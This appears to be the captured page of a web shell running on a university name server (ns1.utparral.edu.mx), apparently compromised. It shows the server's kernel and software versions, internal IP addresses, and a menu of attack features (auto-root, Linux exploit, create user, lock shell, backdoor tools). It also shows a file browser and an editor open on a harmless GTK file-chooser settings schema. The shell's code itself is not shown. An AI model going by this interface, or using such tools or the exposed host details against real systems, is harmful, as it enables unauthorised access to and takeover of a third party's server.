Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
snap /
snap-store /
1113 /
usr /
share /
glib-2.0 /
schemas /
[ HOME SHELL ]
Name
Size
Permission
Action
10_gsettings-desktop-schemas.gschema.override
342
B
-rw-r--r--
10_ubuntu-settings.gschema.override
6.39
KB
-rw-r--r--
org.gnome.ControlCenter.gschema.xml
801
B
-rw-r--r--
org.gnome.desktop.a11y.applications.gschema.xml
845
B
-rw-r--r--
org.gnome.desktop.a11y.gschema.xml
828
B
-rw-r--r--
org.gnome.desktop.a11y.interface.gschema.xml
422
B
-rw-r--r--
org.gnome.desktop.a11y.keyboard.gschema.xml
4.78
KB
-rw-r--r--
org.gnome.desktop.a11y.magnifier.gschema.xml
9.16
KB
-rw-r--r--
org.gnome.desktop.a11y.mouse.gschema.xml
2.84
KB
-rw-r--r--
org.gnome.desktop.app-folders.gschema.xml
1.8
KB
-rw-r--r--
org.gnome.desktop.background.gschema.xml
2.55
KB
-rw-r--r--
org.gnome.desktop.calendar.gschema.xml
427
B
-rw-r--r--
org.gnome.desktop.datetime.gschema.xml
439
B
-rw-r--r--
org.gnome.desktop.default-applications.gschema.xml
3.02
KB
-rw-r--r--
org.gnome.desktop.enums.xml
6.41
KB
-rw-r--r--
org.gnome.desktop.input-sources.gschema.xml
2.49
KB
-rw-r--r--
org.gnome.desktop.interface.gschema.xml
12.18
KB
-rw-r--r--
org.gnome.desktop.lockdown.gschema.xml
3.37
KB
-rw-r--r--
org.gnome.desktop.media-handling.gschema.xml
2.54
KB
-rw-r--r--
org.gnome.desktop.notifications.gschema.xml
2.77
KB
-rw-r--r--
org.gnome.desktop.peripherals.gschema.xml
13.32
KB
-rw-r--r--
org.gnome.desktop.privacy.gschema.xml
4.79
KB
-rw-r--r--
org.gnome.desktop.screensaver.gschema.xml
6.05
KB
-rw-r--r--
org.gnome.desktop.search-providers.gschema.xml
1.86
KB
-rw-r--r--
org.gnome.desktop.session.gschema.xml
668
B
-rw-r--r--
org.gnome.desktop.sound.gschema.xml
1.03
KB
-rw-r--r--
org.gnome.desktop.thumbnail-cache.gschema.xml
600
B
-rw-r--r--
org.gnome.desktop.thumbnailers.gschema.xml
866
B
-rw-r--r--
org.gnome.desktop.wm.keybindings.gschema.xml
13.31
KB
-rw-r--r--
org.gnome.desktop.wm.preferences.gschema.xml
12.61
KB
-rw-r--r--
org.gnome.software.gschema.xml
7.58
KB
-rw-r--r--
org.gnome.system.locale.gschema.xml
448
B
-rw-r--r--
org.gnome.system.location.gschema.xml
1.13
KB
-rw-r--r--
org.gnome.system.proxy.gschema.xml
6.2
KB
-rw-r--r--
org.gtk.Settings.ColorChooser.gschema.xml
931
B
-rw-r--r--
org.gtk.Settings.Debug.gschema.xml
833
B
-rw-r--r--
org.gtk.Settings.EmojiChooser.gschema.xml
623
B
-rw-r--r--
org.gtk.Settings.FileChooser.gschema.xml
6.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org.gtk.Settings.FileChooser.gschema.xml
<?xml version="1.0" encoding="UTF-8"?> <!-- Copyright © 2010 Christian Persch This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library. If not, see <http://www.gnu.org/licenses/>. --> <schemalist> <enum id='org.gtk.Settings.FileChooser.LocationMode'> <value nick='path-bar' value='0'/> <value nick='filename-entry' value='1'/> </enum> <enum id='org.gtk.Settings.FileChooser.SortColumn'> <value nick='name' value='0'/> <value nick='size' value='1'/> <value nick='type' value='2'/> <value nick='modified' value='3'/> </enum> <enum id='org.gtk.Settings.FileChooser.SortOrder'> <value nick='ascending' value='0'/> <value nick='descending' value='1'/> </enum> <enum id='org.gtk.Settings.FileChooser.StartupMode'> <value nick='recent' value='0'/> <value nick='cwd' value='1'/> </enum> <enum id='org.gtk.Settings.FileChooser.ClockFormat'> <value nick='24h' value='0'/> <value nick='12h' value='1'/> </enum> <enum id='org.gtk.Settings.FileChooser.DateFormat'> <value nick='regular' value='0'/> <value nick='with-time' value='1'/> </enum> <enum id='org.gtk.Settings.FileChooser.TypeFormat'> <value nick='mime' value='0'/> <value nick='description' value='1'/> <value nick='category' value='2'/> </enum> <schema id='org.gtk.Settings.FileChooser' path='/org/gtk/settings/file-chooser/'> <key name='last-folder-uri' type='s'> <default>""</default> </key> <key name='location-mode' enum='org.gtk.Settings.FileChooser.LocationMode'> <default>'path-bar'</default> <summary>Location mode</summary> <description> Controls whether the file chooser shows just a path bar, or a visible entry for the filename as well, for the benefit of typing-oriented users. The possible values for these modes are "path-bar" and "filename-entry". </description> </key> <key name='show-hidden' type='b'> <default>false</default> <summary>Show hidden files</summary> <description> Controls whether the file chooser shows hidden files or not. </description> </key> <key type="b" name="sort-directories-first"> <default>false</default> <summary>Show folders first</summary> <description> If set to true, then folders are shown before files in the list. </description> </key> <key name='expand-folders' type='b'> <default>false</default> <summary>Expand folders</summary> <description>This key is deprecated; do not use it.</description> </key> <key name='show-size-column' type='b'> <default>true</default> <summary>Show file sizes</summary> <description> Controls whether the file chooser shows a column with file sizes. </description> </key> <key name='show-type-column' type='b'> <default>true</default> <summary>Show file types</summary> <description> Controls whether the file chooser shows a column with file types. </description> </key> <key name='sort-column' enum='org.gtk.Settings.FileChooser.SortColumn'> <default>'name'</default> <summary>Sort column</summary> <description> Can be one of "name", "modified", or "size". It controls which of the columns in the file chooser is used for sorting the list of files. </description> </key> <key name='sort-order' enum='org.gtk.Settings.FileChooser.SortOrder'> <default>'ascending'</default> <summary>Sort order</summary> <description> Can be one of the strings "ascending" or "descending". </description> </key> <key name='window-position' type='(ii)'> <default>(-1, -1)</default> <summary>Window position</summary> <description> The (x, y) coordinates of the upper-left corner of the GtkFileChooserDialog's window. </description> </key> <key name='window-size' type='(ii)'> <default>(-1, -1)</default> <summary>Window size</summary> <description> The size (width, height) of the GtkFileChooserDialog's window, in pixels. </description> </key> <key name='startup-mode' enum='org.gtk.Settings.FileChooser.StartupMode'> <default>'recent'</default> <summary>Startup mode</summary> <description> Either "recent" or "cwd"; controls whether the file chooser starts up showing the list of recently-used files, or the contents of the current working directory. </description> </key> <key name='sidebar-width' type='i'> <default>148</default> <summary>Sidebar width</summary> <description> Width in pixels of the file chooser's places sidebar. </description> </key> <key name="clock-format" enum="org.gtk.Settings.FileChooser.ClockFormat"> <default>'24h'</default> <summary>Time format</summary> <description> Whether the time is shown in 24h or 12h format. </description> </key> <key name="date-format" enum="org.gtk.Settings.FileChooser.DateFormat"> <default>'regular'</default> <summary>Date format</summary> <description> The amount of detail to show in the Modified column. </description> </key> <key name="type-format" enum="org.gtk.Settings.FileChooser.TypeFormat"> <default>'category'</default> <summary>Type format</summary> <description> Different ways to show the 'Type' column information. Example outputs for a video mp4 file: 'mime' -> 'video/mp4' 'description' -> 'MPEG-4 video' 'category' -> 'Video' </description> </key> </schema> </schemalist>
Close